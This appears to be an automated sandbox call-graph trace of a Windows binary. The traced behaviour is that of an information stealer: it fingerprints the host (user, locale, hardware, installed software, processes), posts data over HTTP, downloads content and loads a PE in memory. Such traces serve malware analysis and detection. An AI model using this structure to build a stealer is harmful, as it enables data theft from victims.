416fb0 4 API calls 79940->79941 79942 404a07 79941->79942 79943 416ea0 lstrcpy 79942->79943 79944 404a10 79943->79944 79945 416f20 3 API calls 79944->79945 79946 404a2e 79945->79946 79947 416ea0 lstrcpy 79946->79947 79948 404a37 79947->79948 79949 416d40 lstrcpy 79948->79949 79950 404a52 79949->79950 79951 416f20 3 API calls 79950->79951 79952 404a73 79951->79952 79953 416f20 3 API calls 79952->79953 79954 404a7a 79953->79954 79955 416ea0 lstrcpy 79954->79955 79956 404a86 79955->79956 79957 404aa7 lstrlen 79956->79957 79958 404aba 79957->79958 79959 404ac3 lstrlen 79958->79959 80870 4170d0 79959->80870 79961 404ad3 HttpSendRequestA 79962 404af2 InternetReadFile 79961->79962 79963 404b27 InternetCloseHandle 79962->79963 79968 404b1e 79962->79968 79966 416e00 79963->79966 79965 416fb0 4 API calls 79965->79968 79966->79888 79967 416ea0 lstrcpy 79967->79968 79968->79962 79968->79963 79968->79965 79968->79967 80880 4170d0 79969->80880 79971 40fb04 StrCmpCA 79972 40fb17 79971->79972 79973 40fb0f ExitProcess 79971->79973 79974 40fb27 strtok_s 79972->79974 79986 40fb34 79974->79986 79975 40fccc 79975->79022 79976 40fca8 strtok_s 79976->79986 79977 40fc8b StrCmpCA 79977->79976 79977->79986 79978 40fc6c StrCmpCA 79978->79986 79979 40fb9d StrCmpCA 79979->79986 79980 40fbed StrCmpCA 79980->79986 79981 40fc4d StrCmpCA 79981->79986 79982 40fc2e StrCmpCA 79982->79986 79983 40fbbf StrCmpCA 79983->79986 79984 40fc0f StrCmpCA 79984->79986 79985 416e20 lstrlen lstrcpy 79985->79986 79986->79975 79986->79976 79986->79977 79986->79978 79986->79979 79986->79980 79986->79981 79986->79982 79986->79983 79986->79984 79986->79985 79988 416da0 lstrcpy 79987->79988 79989 401513 79988->79989 79990 416da0 lstrcpy 79989->79990 79991 401525 79990->79991 79992 416da0 lstrcpy 79991->79992 79993 401537 79992->79993 79994 416da0 lstrcpy 79993->79994 79995 401549 79994->79995 79996 405610 79995->79996 79997 416da0 lstrcpy 79996->79997 79998 405629 79997->79998 79999 404470 3 API calls 79998->79999 80000 405635 79999->80000 80001 416d40 lstrcpy 80000->80001 80002 40566a 80001->80002 80003 416d40 lstrcpy 80002->80003 80004 405677 80003->80004 80005 416d40 lstrcpy 80004->80005 80006 405684 80005->80006 80007 416d40 lstrcpy 80006->80007 80008 405691 80007->80008 80009 416d40 lstrcpy 80008->80009 80010 40569e InternetOpenA StrCmpCA 80009->80010 80011 4056cd 80010->80011 80012 405c70 InternetCloseHandle 80011->80012 80014 415260 3 API calls 80011->80014 80013 405c8d 80012->80013 80016 4094a0 4 API calls 80013->80016 80015 4056ec 80014->80015 80017 416f20 3 API calls 80015->80017 80018 405c93 80016->80018 80019 4056ff 80017->80019 80021 416e20 2 API calls 80018->80021 80024 405ccc moneypunct 80018->80024 80020 416ea0 lstrcpy 80019->80020 80026 405708 80020->80026 80022 405caa 80021->80022 80023 416fb0 4 API calls 80022->80023 80025 405cc0 80023->80025 80028 416da0 lstrcpy 80024->80028 80027 416ea0 lstrcpy 80025->80027 80029 416fb0 4 API calls 80026->80029 80027->80024 80038 405cfc 80028->80038 80030 405732 80029->80030 80031 416ea0 lstrcpy 80030->80031 80032 40573b 80031->80032 80033 416fb0 4 API calls 80032->80033 80034 40575a 80033->80034 80035 416ea0 lstrcpy 80034->80035 80036 405763 80035->80036 80037 416f20 3 API calls 80036->80037 80039 405781 80037->80039 80038->79028 80040 416ea0 lstrcpy 80039->80040 80041 40578a 80040->80041 80042 416fb0 4 API calls 80041->80042 80043 4057a9 80042->80043 80044 416ea0 lstrcpy 80043->80044 80045 4057b2 80044->80045 80046 416fb0 4 API calls 80045->80046 80047 4057d1 80046->80047 80048 416ea0 lstrcpy 80047->80048 80049 4057da 80048->80049 80050 416fb0 4 API calls 80049->80050 80051 405806 80050->80051 80052 416f20 3 API calls 80051->80052 80053 40580d 80052->80053 80054 416ea0 lstrcpy 80053->80054 80055 405816 80054->80055 80056 40582c InternetConnectA 80055->80056 80056->80012 80057 40585c HttpOpenRequestA 80056->80057 80059 405c63 InternetCloseHandle 80057->80059 80060 4058bb 80057->80060 80059->80012 80061 416fb0 4 API calls 80060->80061 80062 4058cf 80061->80062 80063 416ea0 lstrcpy 80062->80063 80064 4058d8 80063->80064 80065 416f20 3 API calls 80064->80065 80066 4058f6 80065->80066 80067 416ea0 lstrcpy 80066->80067 80068 4058ff 80067->80068 80069 416fb0 4 API calls 80068->80069 80070 40591e 80069->80070 80071 416ea0 lstrcpy 80070->80071 80072 405927 80071->80072 80073 416fb0 4 API calls 80072->80073 80074 405948 80073->80074 80075 416ea0 lstrcpy 80074->80075 80076 405951 80075->80076 80077 416fb0 4 API calls 80076->80077 80078 405971 80077->80078 80079 416ea0 lstrcpy 80078->80079 80080 40597a 80079->80080 80081 416fb0 4 API calls 80080->80081 80082 405999 80081->80082 80083 416ea0 lstrcpy 80082->80083 80084 4059a2 80083->80084 80085 416f20 3 API calls 80084->80085 80086 4059c0 80085->80086 80087 416ea0 lstrcpy 80086->80087 80088 4059c9 80087->80088 80089 416fb0 4 API calls 80088->80089 80090 4059e8 80089->80090 80091 416ea0 lstrcpy 80090->80091 80092 4059f1 80091->80092 80093 416fb0 4 API calls 80092->80093 80094 405a10 80093->80094 80095 416ea0 lstrcpy 80094->80095 80096 405a19 80095->80096 80097 416f20 3 API calls 80096->80097 80098 405a37 80097->80098 80099 416ea0 lstrcpy 80098->80099 80100 405a40 80099->80100 80101 416fb0 4 API calls 80100->80101 80102 405a5f 80101->80102 80103 416ea0 lstrcpy 80102->80103 80104 405a68 80103->80104 80105 416fb0 4 API calls 80104->80105 80106 405a89 80105->80106 80107 416ea0 lstrcpy 80106->80107 80108 405a92 80107->80108 80109 416fb0 4 API calls 80108->80109 80110 405ab2 80109->80110 80111 416ea0 lstrcpy 80110->80111 80112 405abb 80111->80112 80113 416fb0 4 API calls 80112->80113 80114 405ada 80113->80114 80115 416ea0 lstrcpy 80114->80115 80116 405ae3 80115->80116 80117 416f20 3 API calls 80116->80117 80118 405b01 80117->80118 80119 416ea0 lstrcpy 80118->80119 80120 405b0a 80119->80120 80121 405b1d lstrlen 80120->80121 80881 4170d0 80121->80881 80123 405b2e lstrlen GetProcessHeap HeapAlloc 80882 4170d0 80123->80882 80125 405b5b lstrlen 80883 4170d0 80125->80883 80127 405b6b memcpy 80884 4170d0 80127->80884 80129 405b84 lstrlen 80130 405b94 80129->80130 80131 405b9d lstrlen memcpy 80130->80131 80885 4170d0 80131->80885 80133 405bc7 lstrlen 80886 4170d0 80133->80886 80135 405bd7 HttpSendRequestA 80136 405be2 InternetReadFile 80135->80136 80137 405c17 InternetCloseHandle 80136->80137 80138 405c0e 80136->80138 80137->80059 80138->80136 80138->80137 80140 416fb0 4 API calls 80138->80140 80141 416ea0 lstrcpy 80138->80141 80140->80138 80141->80138 80887 4170d0 80142->80887 80144 40f3d7 strtok_s 80147 40f3e4 80144->80147 80145 40f4b1 80145->79030 80146 40f48d strtok_s 80146->80147 80147->80145 80147->80146 80148 416e20 lstrlen lstrcpy 80147->80148 80148->80147 80888 4170d0 80149->80888 80151 40f227 strtok_s 80158 40f234 80151->80158 80152 40f363 strtok_s 80152->80158 80153 40f387 80153->79038 80154 40f314 StrCmpCA 80154->80158 80155 40f297 StrCmpCA 80155->80158 80156 40f2d7 StrCmpCA 80156->80158 80157 416e20 lstrlen lstrcpy 80157->80158 80158->80152 80158->80153 80158->80154 80158->80155 80158->80156 80158->80157 80160 416d40 lstrcpy 80159->80160 80161 40fd26 80160->80161 80162 416fb0 4 API calls 80161->80162 80163 40fd37 80162->80163 80164 416ea0 lstrcpy 80163->80164 80165 40fd40 80164->80165 80166 416fb0 4 API calls 80165->80166 80167 40fd5b 80166->80167 80168 416ea0 lstrcpy 80167->80168 80169 40fd64 80168->80169 80170 416fb0 4 API calls 80169->80170 80171 40fd7d 80170->80171 80172 416ea0 lstrcpy 80171->80172 80173 40fd86 80172->80173 80174 416fb0 4 API calls 80173->80174 80175 40fda1 80174->80175 80176 416ea0 lstrcpy 80175->80176 80177 40fdaa 80176->80177 80178 416fb0 4 API calls 80177->80178 80179 40fdc3 80178->80179 80180 416ea0 lstrcpy 80179->80180 80181 40fdcc 80180->80181 80182 416fb0 4 API calls 80181->80182 80183 40fde7 80182->80183 80184 416ea0 lstrcpy 80183->80184 80185 40fdf0 80184->80185 80186 416fb0 4 API calls 80185->80186 80187 40fe09 80186->80187 80188 416ea0 lstrcpy 80187->80188 80189 40fe12 80188->80189 80190 416fb0 4 API calls 80189->80190 80191 40fe2d 80190->80191 80192 416ea0 lstrcpy 80191->80192 80193 40fe36 80192->80193 80194 416fb0 4 API calls 80193->80194 80195 40fe4f 80194->80195 80196 416ea0 lstrcpy 80195->80196 80197 40fe58 80196->80197 80198 416fb0 4 API calls 80197->80198 80199 40fe76 80198->80199 80200 416ea0 lstrcpy 80199->80200 80201 40fe7f 80200->80201 80202 4141c0 6 API calls 80201->80202 80203 40fe96 80202->80203 80204 416f20 3 API calls 80203->80204 80205 40fea9 80204->80205 80206 416ea0 lstrcpy 80205->80206 80207 40feb2 80206->80207 80208 416fb0 4 API calls 80207->80208 80209 40fedc 80208->80209 80210 416ea0 lstrcpy 80209->80210 80211 40fee5 80210->80211 80212 416fb0 4 API calls 80211->80212 80213 40ff05 80212->80213 80214 416ea0 lstrcpy 80213->80214 80215 40ff0e 80214->80215 80889 414300 GetProcessHeap HeapAlloc RegOpenKeyExA 80215->80889 80217 40ff1e 80218 416fb0 4 API calls 80217->80218 80219 40ff2e 80218->80219 80220 416ea0 lstrcpy 80219->80220 80221 40ff37 80220->80221 80222 416fb0 4 API calls 80221->80222 80223 40ff56 80222->80223 80224 416ea0 lstrcpy 80223->80224 80225 40ff5f 80224->80225 80226 416fb0 4 API calls 80225->80226 80227 40ff80 80226->80227 80228 416ea0 lstrcpy 80227->80228 80229 40ff89 80228->80229 80892 414380 GetCurrentProcess IsWow64Process 80229->80892 80232 416fb0 4 API calls 80233 40ffa9 80232->80233 80234 416ea0 lstrcpy 80233->80234 80235 40ffb2 80234->80235 80236 416fb0 4 API calls 80235->80236 80237 40ffd1 80236->80237 80238 416ea0 lstrcpy 80237->80238 80239 40ffda 80238->80239 80240 416fb0 4 API calls 80239->80240 80241 40fffb 80240->80241 80242 416ea0 lstrcpy 80241->80242 80243 410004 80242->80243 80894 4143c0 GetProcessHeap HeapAlloc GetUserNameA 80243->80894 80245 410014 80246 416fb0 4 API calls 80245->80246 80247 410024 80246->80247 80248 416ea0 lstrcpy 80247->80248 80249 41002d 80248->80249 80250 416fb0 4 API calls 80249->80250 80251 41004c 80250->80251 80252 416ea0 lstrcpy 80251->80252 80253 410055 80252->80253 80254 416fb0 4 API calls 80253->80254 80255 410075 80254->80255 80256 416ea0 lstrcpy 80255->80256 80257 41007e 80256->80257 80258 414400 3 API calls 80257->80258 80259 41008e 80258->80259 80260 416fb0 4 API calls 80259->80260 80261 41009e 80260->80261 80262 416ea0 lstrcpy 80261->80262 80263 4100a7 80262->80263 80264 416fb0 4 API calls 80263->80264 80265 4100c6 80264->80265 80266 416ea0 lstrcpy 80265->80266 80267 4100cf 80266->80267 80268 416fb0 4 API calls 80267->80268 80269 4100f0 80268->80269 80270 416ea0 lstrcpy 80269->80270 80271 4100f9 80270->80271 80895 414450 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 80271->80895 80273 410109 80274 416fb0 4 API calls 80273->80274 80275 410119 80274->80275 80276 416ea0 lstrcpy 80275->80276 80277 410122 80276->80277 80278 416fb0 4 API calls 80277->80278 80279 410141 80278->80279 80280 416ea0 lstrcpy 80279->80280 80281 41014a 80280->80281 80282 416fb0 4 API calls 80281->80282 80283 41016b 80282->80283 80284 416ea0 lstrcpy 80283->80284 80285 410174 80284->80285 80896 4144b0 GetProcessHeap HeapAlloc GetTimeZoneInformation 80285->80896 80288 416fb0 4 API calls 80289 410194 80288->80289 80290 416ea0 lstrcpy 80289->80290 80291 41019d 80290->80291 80292 416fb0 4 API calls 80291->80292 80293 4101bc 80292->80293 80294 416ea0 lstrcpy 80293->80294 80295 4101c5 80294->80295 80296 416fb0 4 API calls 80295->80296 80297 4101e5 80296->80297 80298 416ea0 lstrcpy 80297->80298 80299 4101ee 80298->80299 80899 414530 GetUserDefaultLocaleName 80299->80899 80302 416fb0 4 API calls 80303 41020e 80302->80303 80304 416ea0 lstrcpy 80303->80304 80305 410217 80304->80305 80306 416fb0 4 API calls 80305->80306 80307 410236 80306->80307 80308 416ea0 lstrcpy 80307->80308 80309 41023f 80308->80309 80310 416fb0 4 API calls 80309->80310 80311 410260 80310->80311 80312 416ea0 lstrcpy 80311->80312 80313 410269 80312->80313 80904 414570 80313->80904 80315 410280 80316 416f20 3 API calls 80315->80316 80317 410293 80316->80317 80318 416ea0 lstrcpy 80317->80318 80319 41029c 80318->80319 80320 416fb0 4 API calls 80319->80320 80321 4102c6 80320->80321 80322 416ea0 lstrcpy 80321->80322 80323 4102cf 80322->80323 80324 416fb0 4 API calls 80323->80324 80325 4102ef 80324->80325 80326 416ea0 lstrcpy 80325->80326 80327 4102f8 80326->80327 80916 414710 GetSystemPowerStatus 80327->80916 80330 416fb0 4 API calls 80331 410318 80330->80331 80332 416ea0 lstrcpy 80331->80332 80333 410321 80332->80333 80334 416fb0 4 API calls 80333->80334 80335 410340 80334->80335 80336 416ea0 lstrcpy 80335->80336 80337 410349 80336->80337 80338 416fb0 4 API calls 80337->80338 80339 41036a 80338->80339 80340 416ea0 lstrcpy 80339->80340 80341 410373 80340->80341 80342 41037e GetCurrentProcessId 80341->80342 80918 415b70 OpenProcess 80342->80918 80345 416f20 3 API calls 80346 4103a4 80345->80346 80347 416ea0 lstrcpy 80346->80347 80348 4103ad 80347->80348 80349 416fb0 4 API calls 80348->80349 80350 4103d7 80349->80350 80351 416ea0 lstrcpy 80350->80351 80352 4103e0 80351->80352 80353 416fb0 4 API calls 80352->80353 80354 410400 80353->80354 80355 416ea0 lstrcpy 80354->80355 80356 410409 80355->80356 80923 414740 GetProcessHeap HeapAlloc RegOpenKeyExA 80356->80923 80358 410419 80359 416fb0 4 API calls 80358->80359 80360 410429 80359->80360 80361 416ea0 lstrcpy 80360->80361 80362 410432 80361->80362 80363 416fb0 4 API calls 80362->80363 80364 410451 80363->80364 80365 416ea0 lstrcpy 80364->80365 80366 41045a 80365->80366 80367 416fb0 4 API calls 80366->80367 80368 41047b 80367->80368 80369 416ea0 lstrcpy 80368->80369 80370 410484 80369->80370 80926 414800 80370->80926 80373 416fb0 4 API calls 80374 4104a4 80373->80374 80375 416ea0 lstrcpy 80374->80375 80376 4104ad 80375->80376 80377 416fb0 4 API calls 80376->80377 80378 4104cc 80377->80378 80379 416ea0 lstrcpy 80378->80379 80380 4104d5 80379->80380 80381 416fb0 4 API calls 80380->80381 80382 4104f6 80381->80382 80383 416ea0 lstrcpy 80382->80383 80384 4104ff 80383->80384 80941 4147c0 GetSystemInfo wsprintfA 80384->80941 80386 41050f 80387 416fb0 4 API calls 80386->80387 80388 41051f 80387->80388 80389 416ea0 lstrcpy 80388->80389 80390 410528 80389->80390 80391 416fb0 4 API calls 80390->80391 80392 410547 80391->80392 80393 416ea0 lstrcpy 80392->80393 80394 410550 80393->80394 80395 416fb0 4 API calls 80394->80395 80396 410570 80395->80396 80397 416ea0 lstrcpy 80396->80397 80398 410579 80397->80398 80942 414960 GetProcessHeap HeapAlloc 80398->80942 80400 410589 80401 416fb0 4 API calls 80400->80401 80402 410599 80401->80402 80403 416ea0 lstrcpy 80402->80403 80404 4105a2 80403->80404 80405 416fb0 4 API calls 80404->80405 80406 4105c1 80405->80406 80407 416ea0 lstrcpy 80406->80407 80408 4105ca 80407->80408 80409 416fb0 4 API calls 80408->80409 80410 4105eb 80409->80410 80411 416ea0 lstrcpy 80410->80411 80412 4105f4 80411->80412 80947 414ed0 80412->80947 80415 416f20 3 API calls 80416 41061e 80415->80416 80417 416ea0 lstrcpy 80416->80417 80418 410627 80417->80418 80419 416fb0 4 API calls 80418->80419 80420 410651 80419->80420 80421 416ea0 lstrcpy 80420->80421 80422 41065a 80421->80422 80423 416fb0 4 API calls 80422->80423 80424 41067a 80423->80424 80425 416ea0 lstrcpy 80424->80425 80426 410683 80425->80426 80427 416fb0 4 API calls 80426->80427 80428 4106a2 80427->80428 80429 416ea0 lstrcpy 80428->80429 80430 4106ab 80429->80430 80952 414a00 80430->80952 80432 4106c2 80433 416f20 3 API calls 80432->80433 80434 4106d5 80433->80434 80435 416ea0 lstrcpy 80434->80435 80436 4106de 80435->80436 80437 416fb0 4 API calls 80436->80437 80438 41070a 80437->80438 80439 416ea0 lstrcpy 80438->80439 80440 410713 80439->80440 80441 416fb0 4 API calls 80440->80441 80442 410732 80441->80442 80443 416ea0 lstrcpy 80442->80443 80444 41073b 80443->80444 80445 416fb0 4 API calls 80444->80445 80446 41075c 80445->80446 80447 416ea0 lstrcpy 80446->80447 80448 410765 80447->80448 80449 416fb0 4 API calls 80448->80449 80450 410784 80449->80450 80451 416ea0 lstrcpy 80450->80451 80452 41078d 80451->80452 80453 416fb0 4 API calls 80452->80453 80454 4107ae 80453->80454 80455 416ea0 lstrcpy 80454->80455 80456 4107b7 80455->80456 80960 414ae0 80456->80960 80458 4107d3 80459 416f20 3 API calls 80458->80459 80460 4107e6 80459->80460 80461 416ea0 lstrcpy 80460->80461 80462 4107ef 80461->80462 80463 416fb0 4 API calls 80462->80463 80464 410819 80463->80464 80465 416ea0 lstrcpy 80464->80465 80466 410822 80465->80466 80467 416fb0 4 API calls 80466->80467 80468 410843 80467->80468 80469 416ea0 lstrcpy 80468->80469 80470 41084c 80469->80470 80471 414ae0 17 API calls 80470->80471 80472 410868 80471->80472 80473 416f20 3 API calls 80472->80473 80474 41087b 80473->80474 80475 416ea0 lstrcpy 80474->80475 80476 410884 80475->80476 80477 416fb0 4 API calls 80476->80477 80478 4108ae 80477->80478 80479 416ea0 lstrcpy 80478->80479 80480 4108b7 80479->80480 80481 416fb0 4 API calls 80480->80481 80482 4108d6 80481->80482 80483 416ea0 lstrcpy 80482->80483 80484 4108df 80483->80484 80485 416fb0 4 API calls 80484->80485 80486 410900 80485->80486 80487 416ea0 lstrcpy 80486->80487 80488 410909 80487->80488 80996 414de0 80488->80996 80490 410920 80491 416f20 3 API calls 80490->80491 80492 410933 80491->80492 80493 416ea0 lstrcpy 80492->80493 80494 41093c 80493->80494 80495 41095a lstrlen 80494->80495 80496 41096a 80495->80496 80497 416d40 lstrcpy 80496->80497 80498 41097c 80497->80498 80499 401500 lstrcpy 80498->80499 80500 41098a 80499->80500 81006 404dc0 80500->81006 80502 410996 80502->79042 81186 4170d0 80503->81186 80505 404cc9 InternetOpenUrlA 80509 404ce1 80505->80509 80506 404cea InternetReadFile 80506->80509 80507 404d5c InternetCloseHandle InternetCloseHandle 80508 404da8 80507->80508 80508->79046 80509->80506 80509->80507 81187 4092b0 80510->81187 80512 40ef93 80513 40efb4 80512->80513 80514 40f1cf 80512->80514 80516 40efcd StrCmpCA 80513->80516 80515 401500 lstrcpy 80514->80515 80517 40f1dd 80515->80517 80518 40efd8 80516->80518 80546 40f04f 80516->80546 81351 40ea90 80517->81351 80521 416da0 lstrcpy 80518->80521 80523 40eff0 80521->80523 80522 40f06e StrCmpCA 80524 40f14e 80522->80524 80525 40f07d 80522->80525 80526 401500 lstrcpy 80523->80526 80529 40f17d StrCmpCA 80524->80529 80527 416d40 lstrcpy 80525->80527 80528 40f01e 80526->80528 80530 40f08a 80527->80530 80531 416da0 lstrcpy 80528->80531 80532 40f188 80529->80532 80552 40f1c7 80529->80552 80533 416fb0 4 API calls 80530->80533 80534 40f032 80531->80534 80535 401500 lstrcpy 80532->80535 80536 40f0b2 80533->80536 80537 416da0 lstrcpy 80534->80537 80538 40f196 80535->80538 80539 416f20 3 API calls 80536->80539 80540 40f04a 80537->80540 80541 416da0 lstrcpy 80538->80541 80542 40f0b9 80539->80542 80544 40f1aa 80541->80544 80547 416da0 lstrcpy 80544->80547 80546->80522 80552->79050 80845 404486 80844->80845 80876 414ff0 malloc 80845->80876 80847 4044af 80877 414ff0 malloc 80847->80877 80849 4044c5 80878 414ff0 malloc 80849->80878 80851 4044db 80852 4044f5 lstrlen 80851->80852 80879 4170d0 80852->80879 80854 404505 InternetCrackUrlA 80855 404524 80854->80855 80855->79828 80857 416d40 lstrcpy 80856->80857 80858 415274 80857->80858 80859 416d40 lstrcpy 80858->80859 80860 415282 GetSystemTime 80859->80860 80862 415299 80860->80862 80861 416da0 lstrcpy 80863 4152fc 80861->80863 80862->80861 80863->79843 80865 416f31 80864->80865 80866 416f88 80865->80866 80868 416f68 lstrcpy lstrcat 80865->80868 80867 416da0 lstrcpy 80866->80867 80869 416f94 80867->80869 80868->80866 80869->79846 80870->79961 80872 4094d9 LocalAlloc 80871->80872 80873 404bae 80871->80873 80872->80873 80874 4094f4 CryptStringToBinaryA 80872->80874 80873->79849 80873->79852 80874->80873 80875 409519 LocalFree 80874->80875 80875->80873 80876->80847 80877->80849 80878->80851 80879->80854 80880->79971 80881->80123 80882->80125 80883->80127 80884->80129 80885->80133 80886->80135 80887->80144 80888->80151 80890 414362 RegCloseKey 80889->80890 80891 414345 RegQueryValueExA 80889->80891 80890->80217 80891->80890 80893 40ff99 80892->80893 80893->80232 80894->80245 80895->80273 80897 4144f7 wsprintfA 80896->80897 80898 410184 80896->80898 80897->80898 80898->80288 80900 4101fe 80899->80900 80901 41455a 80899->80901 80900->80302 81168 415420 LocalAlloc CharToOemW 80901->81168 80903 414566 80903->80900 80905 416d40 lstrcpy 80904->80905 80906 414589 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 80905->80906 80915 4145e2 80906->80915 80907 414603 GetLocaleInfoA 80907->80915 80908 4146d5 80909 4146e5 80908->80909 80910 4146db LocalFree 80908->80910 80912 416da0 lstrcpy 80909->80912 80910->80909 80911 416fb0 lstrcpy lstrlen lstrcpy lstrcat 80911->80915 80913 4146f4 80912->80913 80913->80315 80914 416ea0 lstrcpy 80914->80915 80915->80907 80915->80908 80915->80911 80915->80914 80917 410308 80916->80917 80917->80330 80919 415b93 K32GetModuleFileNameExA CloseHandle 80918->80919 80920 415bb5 80918->80920 80919->80920 80921 416d40 lstrcpy 80920->80921 80922 410391 80921->80922 80922->80345 80924 4147a2 RegCloseKey 80923->80924 80925 414785 RegQueryValueExA 80923->80925 80924->80358 80925->80924 80927 414836 GetLogicalProcessorInformationEx 80926->80927 80928 414855 GetLastError 80927->80928 80935 4148ab 80927->80935 80929 414860 80928->80929 80930 41489f 80928->80930 80940 414869 80929->80940 80931 410494 80930->80931 81172 4150f0 GetProcessHeap HeapFree 80930->81172 80931->80373 81171 4150f0 GetProcessHeap HeapFree 80935->81171 80937 4148fd 80937->80931 80939 414906 wsprintfA 80937->80939 80938 414893 80938->80931 80939->80931 80940->80927 80940->80938 81169 4150f0 GetProcessHeap HeapFree 80940->81169 81170 415110 GetProcessHeap HeapAlloc 80940->81170 80941->80386 80943 415090 80942->80943 80944 41498a GlobalMemoryStatusEx 80943->80944 80945 4149a0 __aulldiv 80944->80945 80946 4149d8 wsprintfA 80945->80946 80946->80400 80948 414ee8 GetProcessHeap HeapAlloc wsprintfA 80947->80948 80950 416d40 lstrcpy 80948->80950 80951 41060b 80950->80951 80951->80415 80953 416d40 lstrcpy 80952->80953 80959 414a16 80953->80959 80954 414a50 80956 416da0 lstrcpy 80954->80956 80955 416fb0 lstrcpy lstrlen lstrcpy lstrcat 80955->80959 80957 414ac9 80956->80957 80957->80432 80958 416ea0 lstrcpy 80958->80959 80959->80954 80959->80955 80959->80958 80961 416d40 lstrcpy 80960->80961 80962 414af9 RegOpenKeyExA 80961->80962 80963 414b4b 80962->80963 80964 414b6d 80962->80964 80965 416da0 lstrcpy 80963->80965 80966 414db0 RegCloseKey 80964->80966 80967 414b95 RegEnumKeyExA 80964->80967 80976 414b5a 80965->80976 80968 416da0 lstrcpy 80966->80968 80969 414dab 80967->80969 80970 414bdc wsprintfA RegOpenKeyExA 80967->80970 80968->80976 80969->80966 80971 414c22 RegCloseKey RegCloseKey 80970->80971 80972 414c5e RegQueryValueExA 80970->80972 80975 416da0 lstrcpy 80971->80975 80973 414c97 lstrlen 80972->80973 80974 414d9e RegCloseKey 80972->80974 80973->80974 80977 414cad 80973->80977 80974->80969 80975->80976 80976->80458 80978 416fb0 4 API calls 80977->80978 80979 414cc4 80978->80979 80980 416ea0 lstrcpy 80979->80980 80981 414cd0 80980->80981 80982 416fb0 4 API calls 80981->80982 80983 414cf4 80982->80983 80984 416ea0 lstrcpy 80983->80984 80985 414d00 80984->80985 80986 414d0b RegQueryValueExA 80985->80986 80986->80974 80987 414d40 80986->80987 80988 416fb0 4 API calls 80987->80988 80989 414d57 80988->80989 80990 416ea0 lstrcpy 80989->80990 80991 414d63 80990->80991 80992 416fb0 4 API calls 80991->80992 80993 414d87 80992->80993 80994 416ea0 lstrcpy 80993->80994 80995 414d93 80994->80995 80995->80974 80997 416d40 lstrcpy 80996->80997 80998 414df9 CreateToolhelp32Snapshot Process32First 80997->80998 80999 414e25 Process32Next 80998->80999 81000 414e9a FindCloseChangeNotification 80998->81000 80999->81000 81005 414e3a 80999->81005 81001 416da0 lstrcpy 81000->81001 81002 414eb3 81001->81002 81002->80490 81003 416fb0 lstrcpy lstrlen lstrcpy lstrcat 81003->81005 81004 416ea0 lstrcpy 81004->81005 81005->80999 81005->81003 81005->81004 81007 416da0 lstrcpy 81006->81007 81008 404dd9 81007->81008 81009 404470 3 API calls 81008->81009 81010 404de5 81009->81010 81173 4155a0 81010->81173 81012 404e3e 81013 404e49 lstrlen 81012->81013 81014 404e59 81013->81014 81015 4155a0 4 API calls 81014->81015 81016 404e6a 81015->81016 81017 416d40 lstrcpy 81016->81017 81018 404e7d 81017->81018 81019 416d40 lstrcpy 81018->81019 81020 404e8a 81019->81020 81021 416d40 lstrcpy 81020->81021 81022 404e97 81021->81022 81023 416d40 lstrcpy 81022->81023 81024 404ea4 81023->81024 81025 416d40 lstrcpy 81024->81025 81026 404eb1 InternetOpenA StrCmpCA 81025->81026 81027 404ee3 81026->81027 81028 405578 InternetCloseHandle 81027->81028 81029 415260 3 API calls 81027->81029 81035 40558d moneypunct 81028->81035 81030 404f02 81029->81030 81031 416f20 3 API calls 81030->81031 81032 404f15 81031->81032 81033 416ea0 lstrcpy 81032->81033 81034 404f1e 81033->81034 81036 416fb0 4 API calls 81034->81036 81039 416da0 lstrcpy 81035->81039 81037 404f5f 81036->81037 81038 416f20 3 API calls 81037->81038 81040 404f66 81038->81040 81046 4055c7 81039->81046 81041 416fb0 4 API calls 81040->81041 81042 404f6d 81041->81042 81043 416ea0 lstrcpy 81042->81043 81044 404f76 81043->81044 81045 416fb0 4 API calls 81044->81045 81047 404fb7 81045->81047 81046->80502 81048 416f20 3 API calls 81047->81048 81049 404fbe 81048->81049 81050 416ea0 lstrcpy 81049->81050 81051 404fc7 81050->81051 81052 404fdd InternetConnectA 81051->81052 81052->81028 81053 40500d HttpOpenRequestA 81052->81053 81055 40556b InternetCloseHandle 81053->81055 81056 40506b 81053->81056 81055->81028 81057 416fb0 4 API calls 81056->81057 81058 40507f 81057->81058 81059 416ea0 lstrcpy 81058->81059 81060 405088 81059->81060 81061 416f20 3 API calls 81060->81061 81062 4050a6 81061->81062 81063 416ea0 lstrcpy 81062->81063 81064 4050af 81063->81064 81065 416fb0 4 API calls 81064->81065 81066 4050ce 81065->81066 81067 416ea0 lstrcpy 81066->81067 81068 4050d7 81067->81068 81069 416fb0 4 API calls 81068->81069 81070 4050f8 81069->81070 81071 416ea0 lstrcpy 81070->81071 81072 405101 81071->81072 81073 416fb0 4 API calls 81072->81073 81168->80903 81169->80940 81170->80940 81171->80937 81172->80931 81174 4155ad CryptBinaryToStringA 81173->81174 81178 4155a9 81173->81178 81175 4155ce GetProcessHeap RtlAllocateHeap 81174->81175 81174->81178 81176 4155f4 moneypunct 81175->81176 81175->81178 81177 415605 CryptBinaryToStringA 81176->81177 81177->81178 81178->81012 81186->80505 81426 409260 81187->81426 81189 4092c1 81189->80512 81352 416d40 lstrcpy 81351->81352 81353 40eaa6 81352->81353 81354 4154e0 2 API calls 81353->81354 81355 40eabb 81354->81355 81356 416f20 3 API calls 81355->81356 81357 40eacb 81356->81357 81358 416ea0 lstrcpy 81357->81358 81431 414ff0 malloc 81426->81431 81428 40926d 81432 406990 81428->81432 81430 40928c moneypunct 81430->81189 81431->81428 81435 406730 81432->81435 81436 406753 81435->81436 81451 406749 81435->81451 81453 405f20 81436->81453 81440 4067ae 81440->81451 81465 4063a0 81440->81465 81444 40683a 81445 4068d6 VirtualFree 81444->81445 81447 4068e7 81444->81447 81444->81451 81445->81447 81446 406931 81446->81451 81447->81446 81448 406916 FreeLibrary 81447->81448 81449 406928 81447->81449 81448->81447 81451->81430 81455 405f32 81453->81455 81454 405f39 81454->81451 81459 406050 81454->81459 81455->81454 81456 405fbe 81455->81456 81482 415110 GetProcessHeap HeapAlloc 81456->81482 81458 405fe0 81458->81454 81462 40607f VirtualAlloc 81459->81462 81461 406120 81463 406133 VirtualAlloc 81461->81463 81464 40612c 81461->81464 81462->81461 81462->81464 81463->81464 81464->81440 81466 4063c5 81465->81466 81467 4063b9 81465->81467 81466->81451 81476 4065d0 81466->81476 81467->81466 81468 4063f9 LoadLibraryA 81467->81468 81469 406418 81468->81469 81470 406422 81468->81470 81469->81466 81473 4064cc 81470->81473 81483 415110 GetProcessHeap HeapAlloc 81470->81483 81472 406594 GetProcAddress 